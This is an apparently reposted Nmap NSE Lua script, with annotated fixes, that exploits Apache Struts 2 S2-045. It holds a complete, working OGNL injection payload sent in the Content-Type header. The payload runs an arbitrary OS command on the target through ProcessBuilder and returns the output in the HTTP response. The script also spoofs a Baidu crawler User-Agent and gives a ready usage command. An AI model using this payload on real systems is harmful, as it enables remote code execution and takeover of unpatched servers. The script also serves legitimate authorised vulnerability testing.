Nmap NSE proof-of-concept script for Apache Struts 2 S2-045 (OGNL injection via the Content-Type header). Note: this PoC executes an OS command on the target, so only run it against systems you are authorised to test.

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"

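-- Author
author = "k4n5ha0"
-- License
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- Shown by "nmap --script-help"; the original script had no description.
description = [[
Proof-of-concept check for Apache Struts 2 S2-045 (OGNL injection through the
Content-Type header). Sends one HTTP GET whose Content-Type carries an OGNL
expression that runs the script-arg "cmd" on the target and copies the
command's output into the HTTP response.

This script executes a command on the remote host. It is intrusive and must
never be part of "default"/"-sC" scanning.
]]
-- Categories: the script fires a remote-command-execution payload at every
-- HTTP service it is pointed at, so it is neither "safe" nor "default" (the
-- original listed {"safe", "default"}, which would make plain "nmap -sC" run
-- it against every web server found). "exploit"/"intrusive"/"vuln" is the
-- correct set and keeps it opt-in via --script.
categories = {"exploit", "intrusive", "vuln"}
-- Run against any port Nmap identifies as HTTP.
portrule = shortport.http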

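-- Strip leading and trailing whitespace from s.
-- Returns "" for nil so that a caller passing an absent response field
-- (e.g. response.fragment when the body was not truncated) does not abort
-- the whole script with "attempt to index a nil value".
function trim(s)
    if s == nil then
        return ""
    end
    -- gsub returns (string, count); the extra parentheses drop the count.
    return (s:gsub("^%s*(.-)%s*$", "%1"))
end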

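-- Build and send the S2-045 request.
-- host, port : Nmap host/port tables passed through from action().
-- uri        : path of a Struts action to hit (e.g. "/index.action").
-- cmd        : OS command to run. It is spliced into an OGNL single-quoted
--              string literal and is NOT escaped, so a cmd containing ' or \
--              corrupts the expression instead of running.
-- Returns the http.get response table. Side effect: prints the command
-- output to stdout with print(), which bypasses Nmap's output handling
-- (-oN/-oX etc.); the caller should prefer returning that text from action().
function st2exp_generate_http_req(host, port, uri, cmd)
    local options = {header = {}, no_cache = true}
    -- Spoof the Baidu crawler UA. The original literal lacked the closing ")"
    -- that the real crawler sends, which makes the disguise trivially spottable.
    options.header["User-Agent"] =
        "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    -- S2-045: the Jakarta multipart parser evaluates the Content-Type header as
    -- OGNL. The expression unlocks member access, builds a ProcessBuilder
    -- (cmd.exe /c on Windows, /bin/bash -c otherwise), starts it and copies the
    -- process output into the servlet response stream.
    -- NOTE(review): the copy of this script on the page had the token
    -- "#dm=@ognl.OgnlContext" mangled into "#[email protected]" (looks like the
    -- site's e-mail obfuscation); the standard PoC token is restored here.
    local ognl_prefix =
        "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"
    local ognl_suffix =
        "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    options.header["Content-Type"] = ognl_prefix .. cmd .. ognl_suffix
    -- A Cookie header can be injected the same way if a target needs it:
    -- options.header["Cookie"] = ...

    local response = http.get(host, port, uri, options)

    -- The original read only response.fragment, which nmap's http library fills
    -- when a body arrives truncated (presumably the usual case here, since the
    -- payload writes raw bytes to the output stream). When the body is complete
    -- or the request failed that field is nil and trim(nil) aborted the script;
    -- fall back to .body and then to "".
    local output = ""
    if response then
        output = response.fragment or response.body or ""
    end
    print("exploit!!!!!!!!\n----------->>>>:\n\n" .. trim(output) .. "\n\n<<<<-----------")
    return response
end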

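-- Usage
-- Copy this script into Nmap's scripts directory (on Linux typically
-- /usr/local/share/nmap/scripts/), then e.g.:
-- nmap --script st-045.lua --script-args uri=/showcase.action,cmd=id -p 8080 127.0.0.1
-- The args are looked up as "<scriptname>.cmd"/"<scriptname>.uri"; the bare
-- cmd=/uri= form in the example relies on stdnse.get_script_args also trying
-- the part after the last dot.
action = function(host, port)
    -- Command to run on the target; defaults to "whoami", which exists on both
    -- Windows and Linux. (The original default was misspelt "whomai", so runs
    -- without cmd= sent a command that fails on every platform.)
    local cmd = stdnse.get_script_args(SCRIPT_NAME .. ".cmd") or "whoami"
    -- cmd is embedded unescaped in an OGNL single-quoted string literal, so a
    -- ' or \ would corrupt the expression rather than run. Refuse such input
    -- instead of sending a payload that cannot work.
    if cmd:find("[\\']") then
        return "ERROR: cmd must not contain ' or \\ (it is embedded in an OGNL string literal)"
    end
    -- Struts action to hit; any *.action the application maps will do.
    local uri = stdnse.get_script_args(SCRIPT_NAME .. ".uri") or "/index.action"
    local response = st2exp_generate_http_req(host, port, uri, cmd)
    -- Return the command output to Nmap so it shows up in normal script output
    -- and in -oN/-oX, instead of only on stdout via print(). .fragment is where
    -- nmap's http library puts a truncated body; fall back to .body. Nothing
    -- received -> nil -> no script output for this port.
    if not response then
        return nil
    end
    local output = response.fragment or response.body
    if output == nil or output == "" then
        return nil
    end
    return trim(output)
end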

Run nmap with -d to see stdnse.debug1 output; non-ASCII text (e.g. Chinese) is supported.


Reposted from my.oschina.net/9199771/blog/1821868